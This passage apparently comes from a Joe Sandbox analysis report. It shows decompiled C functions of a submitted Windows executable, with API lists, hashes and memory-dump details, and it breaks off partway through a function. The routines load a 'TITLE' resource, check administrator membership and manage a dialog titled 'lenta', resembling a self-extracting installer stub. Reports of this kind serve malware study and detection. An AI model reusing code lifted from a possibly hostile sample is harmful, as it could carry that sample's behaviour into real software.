                                                                                                                                                                                                                                                • Opcode ID: 7db29a542b590c046da3eff455d07dcc5b1590e8c933f05e75e84df082e08c50
                                                                                                                                                                                                                                                • Instruction ID: f7a40a92bc8c054692a2e87561952910999ad2c216c6ac2786af379d23201e51
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7db29a542b590c046da3eff455d07dcc5b1590e8c933f05e75e84df082e08c50
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4011A231244B11BBEB215B349C0DB9B3AA4FB47763F104710FD15A51E0DB788A45C75A
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0005468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E0005468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}








                                                                                                                                                                                                                                                0x00054699
                                                                                                                                                                                                                                                0x0005469b
                                                                                                                                                                                                                                                0x000546a9
                                                                                                                                                                                                                                                0x000546af
                                                                                                                                                                                                                                                0x000546b4
                                                                                                                                                                                                                                                0x000546bc
                                                                                                                                                                                                                                                0x000546f9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000546f9
                                                                                                                                                                                                                                                0x000546d9
                                                                                                                                                                                                                                                0x000546dd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000546e5
                                                                                                                                                                                                                                                0x000546ef
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000546f5
                                                                                                                                                                                                                                                0x000546ff

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546A0
                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546A9
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546C3
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546CC
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546D3
                                                                                                                                                                                                                                                • memcpy_s.MSVCRT ref: 000546E5
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000546EF
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                                • String ID: TITLE$lenta
                                                                                                                                                                                                                                                • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                                • Opcode ID: fbf3f54bfc3780143d0ba5c4222276f2c2706c70ad3381c1e2ca944b10b0ba1a
                                                                                                                                                                                                                                                • Instruction ID: 2247f93a2d031dc4c80df6b07a0cf372dc1f634e1938e55febcb55457c5aca1b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fbf3f54bfc3780143d0ba5c4222276f2c2706c70ad3381c1e2ca944b10b0ba1a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B00181363443107BF3601BA56C4DFAB7E6CDBCBB67F040214FE4996190D9A5888986A7
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000517EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71librarymemoryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                                                                                                                			E000517EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x58004; // 0x5a679bd9
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x5a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00056CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}



















                                                                                                                                                                                                                                                0x000517f6
                                                                                                                                                                                                                                                0x000517fd
                                                                                                                                                                                                                                                0x00051805
                                                                                                                                                                                                                                                0x0005180b
                                                                                                                                                                                                                                                0x0005180d
                                                                                                                                                                                                                                                0x00051815
                                                                                                                                                                                                                                                0x00051818
                                                                                                                                                                                                                                                0x00051820
                                                                                                                                                                                                                                                0x00051824
                                                                                                                                                                                                                                                0x0005182c
                                                                                                                                                                                                                                                0x00051832
                                                                                                                                                                                                                                                0x00051837
                                                                                                                                                                                                                                                0x00051851
                                                                                                                                                                                                                                                0x00051854
                                                                                                                                                                                                                                                0x0005185d
                                                                                                                                                                                                                                                0x00051862
                                                                                                                                                                                                                                                0x0005186c
                                                                                                                                                                                                                                                0x00051872
                                                                                                                                                                                                                                                0x00051877
                                                                                                                                                                                                                                                0x0005187e
                                                                                                                                                                                                                                                0x0005187e
                                                                                                                                                                                                                                                0x00051883
                                                                                                                                                                                                                                                0x00051883
                                                                                                                                                                                                                                                0x0005185d
                                                                                                                                                                                                                                                0x0005188a
                                                                                                                                                                                                                                                0x0005188a
                                                                                                                                                                                                                                                0x000518a2

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,000518DD), ref: 0005181A
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0005182C
                                                                                                                                                                                                                                                • AllocateAndInitializeSid.ADVAPI32(000518DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,000518DD), ref: 00051855
                                                                                                                                                                                                                                                • FreeSid.ADVAPI32(?,?,?,?,000518DD), ref: 00051883
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,000518DD), ref: 0005188A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                                • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                                • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                                • Opcode ID: 594102fff5da1f8c8a443d96cf953c8ecb1a39dd01f01bc50634d6f6cd1d024e
                                                                                                                                                                                                                                                • Instruction ID: d4d719a43aff98660e110e8a76e1348f7b34e157a679f17dd5c9b54bca308a7d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 594102fff5da1f8c8a443d96cf953c8ecb1a39dd01f01bc50634d6f6cd1d024e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE118131F00309ABEB109FA4DC49BBFBBB8EF45712F100569FA11E3290DA759D048B91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00053450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00053450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E000543D0(_t24, _t12);
					SetWindowTextA(_t24, "lenta");
					SetDlgItemTextA(_t24, 0x838,  *0x59404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x591dc = 1;
					goto L8;
				}
				return 0;
			}








                                                                                                                                                                                                                                                0x00053459
                                                                                                                                                                                                                                                0x0005345c
                                                                                                                                                                                                                                                0x000534d8
                                                                                                                                                                                                                                                0x000534de
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000534e0
                                                                                                                                                                                                                                                0x0005345e
                                                                                                                                                                                                                                                0x00053463
                                                                                                                                                                                                                                                0x0005349a
                                                                                                                                                                                                                                                0x000534a0
                                                                                                                                                                                                                                                0x000534a7
                                                                                                                                                                                                                                                0x000534b2
                                                                                                                                                                                                                                                0x000534c4
                                                                                                                                                                                                                                                0x000534cb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000534cb
                                                                                                                                                                                                                                                0x00053468
                                                                                                                                                                                                                                                0x0005346e
                                                                                                                                                                                                                                                0x00053474
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005347c
                                                                                                                                                                                                                                                0x0005348c
                                                                                                                                                                                                                                                0x00053490
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053496
                                                                                                                                                                                                                                                0x00053484
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053486
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053486
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00053490
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0005349A
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 000534B2
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000838), ref: 000534C4
                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 000534CB
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 000534D8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                                • Opcode ID: 366a248d2075e2843676df32d784047c41e6698a2caef46ef98263efb1511576
                                                                                                                                                                                                                                                • Instruction ID: 6007708ce5c49b93b142c60f4a184aa38ee95b18575ff5d4e3463ef970026c57
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 366a248d2075e2843676df32d784047c41e6698a2caef46ef98263efb1511576
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7801D831340614ABE7265F64DC0C96F3B54EB06783F008510FE46865A0CB34AF45DF85
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00052AAC Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E00052AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x58004; // 0x5a679bd9
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x59a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00051680(_t65, E000517C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E000565E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00051680(_t65, E000517C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00056CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}






















                                                                                                                                                                                                                                                0x00052aac
                                                                                                                                                                                                                                                0x00052ab7
                                                                                                                                                                                                                                                0x00052abc
                                                                                                                                                                                                                                                0x00052abe
                                                                                                                                                                                                                                                0x00052ac3
                                                                                                                                                                                                                                                0x00052ac6
                                                                                                                                                                                                                                                0x00052ac9
                                                                                                                                                                                                                                                0x00052ace
                                                                                                                                                                                                                                                0x00052ae6
                                                                                                                                                                                                                                                0x00052bdc
                                                                                                                                                                                                                                                0x00052bdc
                                                                                                                                                                                                                                                0x00052be0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052af2
                                                                                                                                                                                                                                                0x00052afc
                                                                                                                                                                                                                                                0x00052b00
                                                                                                                                                                                                                                                0x00052b05
                                                                                                                                                                                                                                                0x00052b05
                                                                                                                                                                                                                                                0x00052b0b
                                                                                                                                                                                                                                                0x00052bca
                                                                                                                                                                                                                                                0x00052bd1
                                                                                                                                                                                                                                                0x00052b11
                                                                                                                                                                                                                                                0x00052b18
                                                                                                                                                                                                                                                0x00052b26
                                                                                                                                                                                                                                                0x00052b99
                                                                                                                                                                                                                                                0x00052bc8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052b9b
                                                                                                                                                                                                                                                0x00052bae
                                                                                                                                                                                                                                                0x00052bb3
                                                                                                                                                                                                                                                0x00052bb5
                                                                                                                                                                                                                                                0x00052bb5
                                                                                                                                                                                                                                                0x00052bb8
                                                                                                                                                                                                                                                0x00052bb8
                                                                                                                                                                                                                                                0x00052bba
                                                                                                                                                                                                                                                0x00052bbb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052bb8
                                                                                                                                                                                                                                                0x00052b28
                                                                                                                                                                                                                                                0x00052b2e
                                                                                                                                                                                                                                                0x00052b33
                                                                                                                                                                                                                                                0x00052b39
                                                                                                                                                                                                                                                0x00052b3c
                                                                                                                                                                                                                                                0x00052b3c
                                                                                                                                                                                                                                                0x00052b3e
                                                                                                                                                                                                                                                0x00052b3f
                                                                                                                                                                                                                                                0x00052b55
                                                                                                                                                                                                                                                0x00052b5d
                                                                                                                                                                                                                                                0x00052b64
                                                                                                                                                                                                                                                0x00052b64
                                                                                                                                                                                                                                                0x00052b7a
                                                                                                                                                                                                                                                0x00052b7f
                                                                                                                                                                                                                                                0x00052b81
                                                                                                                                                                                                                                                0x00052b81
                                                                                                                                                                                                                                                0x00052b84
                                                                                                                                                                                                                                                0x00052b84
                                                                                                                                                                                                                                                0x00052b86
                                                                                                                                                                                                                                                0x00052b87
                                                                                                                                                                                                                                                0x00052bbf
                                                                                                                                                                                                                                                0x00052bc1
                                                                                                                                                                                                                                                0x00052bc1
                                                                                                                                                                                                                                                0x00052b26
                                                                                                                                                                                                                                                0x00052bda
                                                                                                                                                                                                                                                0x00052bda
                                                                                                                                                                                                                                                0x00052be6
                                                                                                                                                                                                                                                0x00052be6
                                                                                                                                                                                                                                                0x00052bf8

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00052AE6
                                                                                                                                                                                                                                                • IsDBCSLeadByte.KERNEL32(00000000), ref: 00052AF2
                                                                                                                                                                                                                                                • CharNextA.USER32(?), ref: 00052B12
                                                                                                                                                                                                                                                • CharUpperA.USER32 ref: 00052B1E
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,?), ref: 00052B55
                                                                                                                                                                                                                                                • CharNextA.USER32(?), ref: 00052BD4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 571164536-0
                                                                                                                                                                                                                                                • Opcode ID: 3077ddff05c9bf5ef79afec710c75e6781f688ee147de71d170beb5d8fa8786c
                                                                                                                                                                                                                                                • Instruction ID: 598670ae1da5c34995d6897d0cf4dedcb4dd6fdd7646e268f337db7b61a376cd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3077ddff05c9bf5ef79afec710c75e6781f688ee147de71d170beb5d8fa8786c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD4105346082459FEB559F348C54AFF7BA99F57302F14019AECC293202DB394E8ACBA1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000543D0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E000543D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x58004; // 0x5a679bd9
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00056CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}
























                                                                                                                                                                                                                                                0x000543d0
                                                                                                                                                                                                                                                0x000543d8
                                                                                                                                                                                                                                                0x000543df
                                                                                                                                                                                                                                                0x000543e6
                                                                                                                                                                                                                                                0x000543ec
                                                                                                                                                                                                                                                0x000543f1
                                                                                                                                                                                                                                                0x00054400
                                                                                                                                                                                                                                                0x00054403
                                                                                                                                                                                                                                                0x0005440b
                                                                                                                                                                                                                                                0x00054420
                                                                                                                                                                                                                                                0x00054429
                                                                                                                                                                                                                                                0x00054437
                                                                                                                                                                                                                                                0x00054444
                                                                                                                                                                                                                                                0x00054447
                                                                                                                                                                                                                                                0x0005444d
                                                                                                                                                                                                                                                0x00054454
                                                                                                                                                                                                                                                0x0005445b
                                                                                                                                                                                                                                                0x00054460
                                                                                                                                                                                                                                                0x00054461
                                                                                                                                                                                                                                                0x00054467
                                                                                                                                                                                                                                                0x0005446f
                                                                                                                                                                                                                                                0x00054473
                                                                                                                                                                                                                                                0x00054473
                                                                                                                                                                                                                                                0x00054463
                                                                                                                                                                                                                                                0x00054463
                                                                                                                                                                                                                                                0x00054463
                                                                                                                                                                                                                                                0x0005447a
                                                                                                                                                                                                                                                0x00054481
                                                                                                                                                                                                                                                0x00054484
                                                                                                                                                                                                                                                0x0005448a
                                                                                                                                                                                                                                                0x00054492
                                                                                                                                                                                                                                                0x00054496
                                                                                                                                                                                                                                                0x00054496
                                                                                                                                                                                                                                                0x00054486
                                                                                                                                                                                                                                                0x00054486
                                                                                                                                                                                                                                                0x00054486
                                                                                                                                                                                                                                                0x000544b8

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 000543F1
                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0005440B
                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00054423
                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0005442E
                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0005443A
                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00054447
                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 000544A2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2212493051-0
                                                                                                                                                                                                                                                • Opcode ID: 541e3adef85171417b296af084ed5e1a1531c5ff70f145e1ac9e47e34824374d
                                                                                                                                                                                                                                                • Instruction ID: 52f2ee5aac54e88fb228df9662ba7ff62af92bdd99ef7843dbf488bf17ffa1f6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 541e3adef85171417b296af084ed5e1a1531c5ff70f145e1ac9e47e34824374d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81313C32E00619AFDB14CFB8DD889EFBBB5EB89311F154269E905B3240DA346C458B60
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00056298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 53%
                                                                                                                                                                                                                                                			E00056298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x58004; // 0x5a679bd9
				_v8 = _t16 ^ _t50;
